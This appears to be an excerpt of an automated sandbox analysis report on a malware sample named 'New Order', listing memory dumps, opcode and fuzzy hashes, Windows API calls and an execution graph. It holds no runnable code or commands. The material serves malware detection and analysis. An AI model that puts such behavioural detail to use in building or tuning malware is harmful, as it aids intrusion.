                                                                                                                              • Instruction ID: efdd3d26f4aca547afffedf8ed89666c6d3378763533db6bc79abc126288540c
                                                                                                                              • Opcode Fuzzy Hash: 6aea7ff9d2ac2874882ddbba9e9fc56a5b0087053763acb1b513c5bfa1571373
                                                                                                                              • Instruction Fuzzy Hash: 4A11F5B9800349DFDB10CF9AC485BDEBBF8EB58320F10845AE519A7200D375A954CFA1
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 02D9B326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 8c7d417cc490a6d67efdb118268c414a0a5f1181a29be03a2cb4dbd599c98401
                                                                                                                              • Instruction ID: fec2eb7f5db83e8977b1e05d1a1ae7686f2d85cc42429d14eddb2b0a91bb3b5b
                                                                                                                              • Opcode Fuzzy Hash: 8c7d417cc490a6d67efdb118268c414a0a5f1181a29be03a2cb4dbd599c98401
                                                                                                                              • Instruction Fuzzy Hash: 76110FB6C007498FCB10CF9AD444ADEFBF4AF88224F10851AD459A7310D379A545CFA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 904af49a9657291aa2a9a51e97a0c85c8e95ee669c808c2e30e53acbb9b0a668
                                                                                                                              • Instruction ID: 308f9200046fbed7177bc657f62592df02119e292733bed40cb43e2b0b82d132
                                                                                                                              • Opcode Fuzzy Hash: 904af49a9657291aa2a9a51e97a0c85c8e95ee669c808c2e30e53acbb9b0a668
                                                                                                                              • Instruction Fuzzy Hash: 6721087A504640DFDF09DF94E9C0B2ABF65FB84320F60C56AED050B656C376D416CB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fff9828849cc410555e31ac06d06d015815bba4c432e70eeac19b4f3f7152544
                                                                                                                              • Instruction ID: a3f9b02429eb83f14e1feacfdcfd839b4b6f1e771ffec5340c05a378819aa06a
                                                                                                                              • Opcode Fuzzy Hash: fff9828849cc410555e31ac06d06d015815bba4c432e70eeac19b4f3f7152544
                                                                                                                              • Instruction Fuzzy Hash: 9621367A500640DFDF09DF54E9C0B26BF71FB88318F60C569E9490B656C336D416CAA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167818125.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11bd000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 35834541fd400a967bbca2bd84491986d72216667a24e7e613709defd15f232a
                                                                                                                              • Instruction ID: 49e6232b63d241c2d16d23105bdfdb126a0ac007d18d02788c11f9a4d18484f5
                                                                                                                              • Opcode Fuzzy Hash: 35834541fd400a967bbca2bd84491986d72216667a24e7e613709defd15f232a
                                                                                                                              • Instruction Fuzzy Hash: 19210075604200EFDF1DDF58E9C0B66BB61EB88318F20C5ADE90A4B252C77AD406CA62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167818125.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11bd000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 15d611a8b4b07bcffde6b0152435d4d39fac535157157ae72239a71ceb0cb44b
                                                                                                                              • Instruction ID: fe64f0cf813a39e12f99ac877cbbe9e612f5e47da02cfd7249a343a3083940dc
                                                                                                                              • Opcode Fuzzy Hash: 15d611a8b4b07bcffde6b0152435d4d39fac535157157ae72239a71ceb0cb44b
                                                                                                                              • Instruction Fuzzy Hash: 582180755083809FCB06CF64D9D4B15BF71EB46218F28C5DAD8498F2A7C33AD816CB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                              • Instruction ID: 88de6064bea6b3215ac9913b327ae9c43b204285dd50ff6810716bdf319f1af4
                                                                                                                              • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                                                                                                                              • Instruction Fuzzy Hash: FC21C076404640CFCF06CF44D9C4B16BF61FB84324F24C1AADC440A656C33AD41ACB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                              • Instruction ID: 330b4e31b3bf11618235bcf84f1b449ac66fc7604eae04a850ed62a45ab9100f
                                                                                                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                                              • Instruction Fuzzy Hash: A411AF76504680CFCF16CF54E5C4B1ABF71FB84318F24C6A9D8494B656C33AD456CBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d9260d2d24aa87b22e9f1077d76d0af3d4fa43d48f9a9dbd8ad0fb27be2a21c4
                                                                                                                              • Instruction ID: e2c5a1056d4a45ff3e9353d7f357e7a3a38bbad085b0bf5cfab0cd0d347971d7
                                                                                                                              • Opcode Fuzzy Hash: d9260d2d24aa87b22e9f1077d76d0af3d4fa43d48f9a9dbd8ad0fb27be2a21c4
                                                                                                                              • Instruction Fuzzy Hash: FA01FC75404B849AFB1D4AE9DD80B66BF98DF40328F54C519DD084B592C7789440C672
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2167725524.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11ad000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c62d5835e1b999371849966d052689b29f95bfd3e8834df6b4aa64513de0d4e1
                                                                                                                              • Instruction ID: 877cc0841f71cd8cadcb767856e60018131f4661791fd597e557ad8bf78cdd70
                                                                                                                              • Opcode Fuzzy Hash: c62d5835e1b999371849966d052689b29f95bfd3e8834df6b4aa64513de0d4e1
                                                                                                                              • Instruction Fuzzy Hash: 53F0C276404784AAEB158A59D984B66FF98EB80638F18C55AED084F693C3789840CA71
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65a4eaecdaa15995d7a831691ca2f4d7c72349c47de7907c1745ed2059c46d83
                                                                                                                              • Instruction ID: c51a44ad414ff28d9c8b0032180600e12637ce0beab239858d5c58203a2da167
                                                                                                                              • Opcode Fuzzy Hash: 65a4eaecdaa15995d7a831691ca2f4d7c72349c47de7907c1745ed2059c46d83
                                                                                                                              • Instruction Fuzzy Hash: 48D19CB1701605AFEB25EB75C450BAFB7F6AF89300F14886ED14A9B390DB35E901CB61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 11adab289b0ed0188b934320ad6e7e64296ff1ca6fdae0ae1925261e2030b8ac
                                                                                                                              • Instruction ID: abaabebe2d192020be179160013e3019c482c5e3d04c21246f4f64961de35a01
                                                                                                                              • Opcode Fuzzy Hash: 11adab289b0ed0188b934320ad6e7e64296ff1ca6fdae0ae1925261e2030b8ac
                                                                                                                              • Instruction Fuzzy Hash: 7C1290B05227458AF751DF25E84E1893FAABB85328F90470DE3616F2E5EFB4114ACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21e3f2657f83ea176c80f7dc9301b47fb2a27d467d3cc468c7aab46150ed5efb
                                                                                                                              • Instruction ID: 809fb49a6491dc86f2a643292926af53ae3eca1b35da10adac301557253618ad
                                                                                                                              • Opcode Fuzzy Hash: 21e3f2657f83ea176c80f7dc9301b47fb2a27d467d3cc468c7aab46150ed5efb
                                                                                                                              • Instruction Fuzzy Hash: 7AE1FBB4E002599FDB14DFA9C590AAEFBB2FF89304F24816AD414AB355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f51113b6143a5c913dacbcbaf25da6a8c21e962bde9a4e04c83edf1922efc83
                                                                                                                              • Instruction ID: 24e54e6358c7a04a4f13706ed511142f010a4dad5fed1d3df371cbc8c4f7345b
                                                                                                                              • Opcode Fuzzy Hash: 2f51113b6143a5c913dacbcbaf25da6a8c21e962bde9a4e04c83edf1922efc83
                                                                                                                              • Instruction Fuzzy Hash: A2E10CB4E002599FDB14DFADC590AAEFBB2FF89304F24826AD414A7355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b20a3357cface6fc9589373f57ffd8937fd4b341da0cde4f2b193e0e5106deb
                                                                                                                              • Instruction ID: 5ad5091b9bf7fcecf410b283fbe4994ab9646e7260edeed96d1f4c05220853a5
                                                                                                                              • Opcode Fuzzy Hash: 4b20a3357cface6fc9589373f57ffd8937fd4b341da0cde4f2b193e0e5106deb
                                                                                                                              • Instruction Fuzzy Hash: 1BE10AB4E002599FDB14DFA9C590AAEFBF2BF49304F25826AD414AB355C730A942CF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7909e72098def936cda0178d583cb5b4cd2258b70140048ac0cde7c193fa0c3d
                                                                                                                              • Instruction ID: dcd2757d7b5ca9f0eeac968064ce73f6ff23c9898b24da607b46d18ed156e501
                                                                                                                              • Opcode Fuzzy Hash: 7909e72098def936cda0178d583cb5b4cd2258b70140048ac0cde7c193fa0c3d
                                                                                                                              • Instruction Fuzzy Hash: B4E10BB4E002599FDB14DF9DC590AAEFBB2FF89304F24826AD414AB355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 45981590042643027a2cb2fa47994b1a381e942eb95a7d422ef4883896433db1
                                                                                                                              • Instruction ID: 96abae8c9c83e7bc72234c28984c942ffa1de7a41fa7ba2e158be6178130f021
                                                                                                                              • Opcode Fuzzy Hash: 45981590042643027a2cb2fa47994b1a381e942eb95a7d422ef4883896433db1
                                                                                                                              • Instruction Fuzzy Hash: 65E1FAB4E002599FDB14DF9DC590AAEFBB2FF89304F24826AD414AB355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 23150d7d55bc9abddc52d81f401e1e4259c72aaf12ab6a6a5ea2a76a5f8d70b6
                                                                                                                              • Instruction ID: 521495c63dbfd118f2233a99c5314cd05edd34795035b22062924763efcc5ee7
                                                                                                                              • Opcode Fuzzy Hash: 23150d7d55bc9abddc52d81f401e1e4259c72aaf12ab6a6a5ea2a76a5f8d70b6
                                                                                                                              • Instruction Fuzzy Hash: 24D1F931D2075ACADB10EBA4D9906AAB7B1FF96300F50C79AD14977250EFB06AC4CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dba588d707686e3c317c73579251ebea8129c1d84f676e160ff8da8452aaf937
                                                                                                                              • Instruction ID: d98fb0edc2cdb9806d19a7563e3d05d37a2c3f743cb6019531f2553aabf435e7
                                                                                                                              • Opcode Fuzzy Hash: dba588d707686e3c317c73579251ebea8129c1d84f676e160ff8da8452aaf937
                                                                                                                              • Instruction Fuzzy Hash: 41D1F735D2075ACADB14EBA4D9906AAB7B2FF95300F50C79AD14977250EFB06AC4CF80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 59c2d437e65c2b699b9e30aca7bd43af058b9192c9619e99d7995ce2e4e5a11a
                                                                                                                              • Instruction ID: ee1d92d9be0490ade5c4ade70f09fb0b42e2bda447440f6e95bc40f726086d7b
                                                                                                                              • Opcode Fuzzy Hash: 59c2d437e65c2b699b9e30aca7bd43af058b9192c9619e99d7995ce2e4e5a11a
                                                                                                                              • Instruction Fuzzy Hash: 43A14B32A102058FCF19EFA5C94059EBBB3FF84300B25856AF905AB365DB71ED55CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c6232921965369b39c6b03dfb627a865fe334fedd87f72cdeb4734a4c62816e
                                                                                                                              • Instruction ID: a556a68e567812343c1ce22e2287193439710604d8ec7825dd1d830492c9cdb9
                                                                                                                              • Opcode Fuzzy Hash: 7c6232921965369b39c6b03dfb627a865fe334fedd87f72cdeb4734a4c62816e
                                                                                                                              • Instruction Fuzzy Hash: 36C135B09227498BF751DF25E84A1893FBABB85324F514709E3616F2E1EFB4148ACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d33629b9b5cd094b64704be80848cb7128be6fb099342fc79b0a1075e66ac12
                                                                                                                              • Instruction ID: 70ac36fa57d199fa4e168eccf7959399aeabb2b7ac59915e6df21a8d570a39d4
                                                                                                                              • Opcode Fuzzy Hash: 5d33629b9b5cd094b64704be80848cb7128be6fb099342fc79b0a1075e66ac12
                                                                                                                              • Instruction Fuzzy Hash: 55511BB4E002598FDB14DFA9C6916AEFBF2BF89304F24816AD418AB315D7309942CF61

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                                              Signature Coverage:7.9%
                                                                                                                              Total number of Nodes:139
                                                                                                                              Total number of Limit Nodes:9
                                                                                                                              execution_graph 92800 430023 92801 430033 92800->92801 92802 430039 92800->92802 92805 42f063 92802->92805 92804 43005f 92808 42d1a3 92805->92808 92807 42f07e 92807->92804 92809 42d1c0 92808->92809 92810 42d1d1 RtlAllocateHeap 92809->92810 92810->92807 92811 401b61 92812 401b80 92811->92812 92815 4304f3 92812->92815 92813 401c50 92813->92813 92818 42eb03 92815->92818 92819 42eb27 92818->92819 92830 4073c3 92819->92830 92821 42eb50 92822 42ebac 92821->92822 92833 41b7e3 92821->92833 92822->92813 92824 42eb6f 92825 42eb84 92824->92825 92848 42d243 92824->92848 92844 428a03 92825->92844 92828 42eb9e 92829 42d243 ExitProcess 92828->92829 92829->92822 92851 416b53 92830->92851 92832 4073d0 92832->92821 92834 41b80f 92833->92834 92875 41b6d3 92834->92875 92837 41b854 92839 41b870 92837->92839 92842 42ce83 NtClose 92837->92842 92838 41b83c 92840 41b847 92838->92840 92881 42ce83 92838->92881 92839->92824 92840->92824 92843 41b866 92842->92843 92843->92824 92845 428a65 92844->92845 92846 428a72 92845->92846 92889 418d13 92845->92889 92846->92828 92849 42d25d 92848->92849 92850 42d26e ExitProcess 92849->92850 92850->92825 92852 416b70 92851->92852 92854 416b89 92852->92854 92855 42d8d3 92852->92855 92854->92832 92857 42d8ed 92855->92857 92856 42d91c 92856->92854 92857->92856 92862 42c4c3 92857->92862 92863 42c4dd 92862->92863 92869 1842c0a 92863->92869 92864 42c509 92866 42ef83 92864->92866 92872 42d1f3 92866->92872 92868 42d995 92868->92854 92870 1842c11 92869->92870 92871 1842c1f LdrInitializeThunk 92869->92871 92870->92864 92871->92864 92873 42d210 92872->92873 92874 42d221 RtlFreeHeap 92873->92874 92874->92868 92876 41b6d4 92875->92876 92880 41b7c9 92876->92880 92884 42c563 92876->92884 92879 42ce83 NtClose 92879->92880 92880->92837 92880->92838 92882 42cea0 92881->92882 92883 42ceb1 NtClose 92882->92883 92883->92840 92885 42c580 92884->92885 92888 18435c0 LdrInitializeThunk 92885->92888 92886 41b7bd 92886->92879 92888->92886 92890 418d3d 92889->92890 92896 41924b 92890->92896 92897 414313 92890->92897 92892 418e6a 92893 42ef83 RtlFreeHeap 92892->92893 92892->92896 92894 418e82 92893->92894 92895 42d243 ExitProcess 92894->92895 92894->92896 92895->92896 92896->92846 92901 414333 92897->92901 92899 41439c 92899->92892 92900 414392 92900->92892 92901->92899 92902 41baf3 RtlFreeHeap LdrInitializeThunk 92901->92902 92902->92900 92903 425123 92904 42513f 92903->92904 92905 425167 92904->92905 92906 42517b 92904->92906 92907 42ce83 NtClose 92905->92907 92908 42ce83 NtClose 92906->92908 92909 425170 92907->92909 92910 425184 92908->92910 92913 42f0a3 RtlAllocateHeap 92910->92913 92912 42518f 92913->92912 92928 42c473 92929 42c490 92928->92929 92932 1842df0 LdrInitializeThunk 92929->92932 92930 42c4b8 92932->92930 92933 4254b3 92934 4254cc 92933->92934 92935 425517 92934->92935 92938 42555a 92934->92938 92940 42555f 92934->92940 92936 42ef83 RtlFreeHeap 92935->92936 92937 425527 92936->92937 92939 42ef83 RtlFreeHeap 92938->92939 92939->92940 92914 4146a3 92915 4146bd 92914->92915 92920 417ea3 92915->92920 92917 4146db 92918 414720 92917->92918 92919 41470f PostThreadMessageW 92917->92919 92919->92918 92921 417ec7 92920->92921 92922 417ece 92921->92922 92923 417f03 LdrLoadDll 92921->92923 92922->92917 92923->92922 92941 41ac73 92942 41ac8b 92941->92942 92944 41ace5 92941->92944 92942->92944 92945 41ebd3 92942->92945 92946 41ebf9 92945->92946 92950 41ecf6 92946->92950 92951 430153 92946->92951 92948 41ec94 92949 42c4c3 LdrInitializeThunk 92948->92949 92948->92950 92949->92950 92950->92944 92952 4300c3 92951->92952 92953 42f063 RtlAllocateHeap 92952->92953 92954 430120 92952->92954 92955 4300fd 92953->92955 92954->92948 92956 42ef83 RtlFreeHeap 92955->92956 92956->92954 92957 41b9d3 92958 41ba17 92957->92958 92959 41ba38 92958->92959 92960 42ce83 NtClose 92958->92960 92960->92959 92961 4143b3 92963 4143d9 92961->92963 92962 414403 92963->92962 92965 414133 92963->92965 92966 414155 92965->92966 92968 42d113 92965->92968 92966->92962 92969 42d12d 92968->92969 92972 1842c70 LdrInitializeThunk 92969->92972 92970 42d155 92970->92966 92972->92970 92924 1842b60 LdrInitializeThunk 92925 419468 92926 42ce83 NtClose 92925->92926 92927 419472 92926->92927

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 185 417ea3-417ecc call 42fb63 188 417ed2-417ee0 call 430163 185->188 189 417ece-417ed1 185->189 192 417ef0-417f01 call 42e5d3 188->192 193 417ee2-417eed call 430403 188->193 198 417f03-417f17 LdrLoadDll 192->198 199 417f1a-417f1d 192->199 193->192 198->199
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 9a59494733ac891ecc550804846ff8bc25cff2bcc0ab931c2fb2fc0fd0ed1df2
                                                                                                                              • Instruction ID: d01785134a37ca1469afc11c66bf7def8935eec4b94fefb950af1945d5f30997
                                                                                                                              • Opcode Fuzzy Hash: 9a59494733ac891ecc550804846ff8bc25cff2bcc0ab931c2fb2fc0fd0ed1df2
                                                                                                                              • Instruction Fuzzy Hash: AE0175B1E0020DB7DF10DBE1DC52FDEB7B89B14308F0041A6E90897240F635EB598755

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 205 42ce83-42cebf call 4045f3 call 42e0c3 NtClose
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CEBA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction ID: 0285b116ec681e8c09839647c474c12df3e0b764612613c280807b226c76f132
                                                                                                                              • Opcode Fuzzy Hash: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction Fuzzy Hash: 48E08C722412147BD620EB5ADC01FABB76CEFC5754F00441AFB0CA7242DAB5BA0187F9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 219 1842b60-1842b6c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                              • Instruction ID: 708da6853d7115dd6ae460148a3fd5828274f3b1612557eb572eb884a2dded46
                                                                                                                              • Opcode Fuzzy Hash: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                              • Instruction Fuzzy Hash: 1990026120240007424671594414616440AD7E1301B55C022F6018590DC5258A956626

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 221 1842df0-1842dfc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                              • Instruction ID: 8b2a465b3071ceb2ca8f11c589425ca2738e131e162cb431cd8e2105e6e03cb1
                                                                                                                              • Opcode Fuzzy Hash: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                              • Instruction Fuzzy Hash: FF90023120140417D252715945047070409D7D1341F95C413B5428558DD6568B56A622

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 220 1842c70-1842c7c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
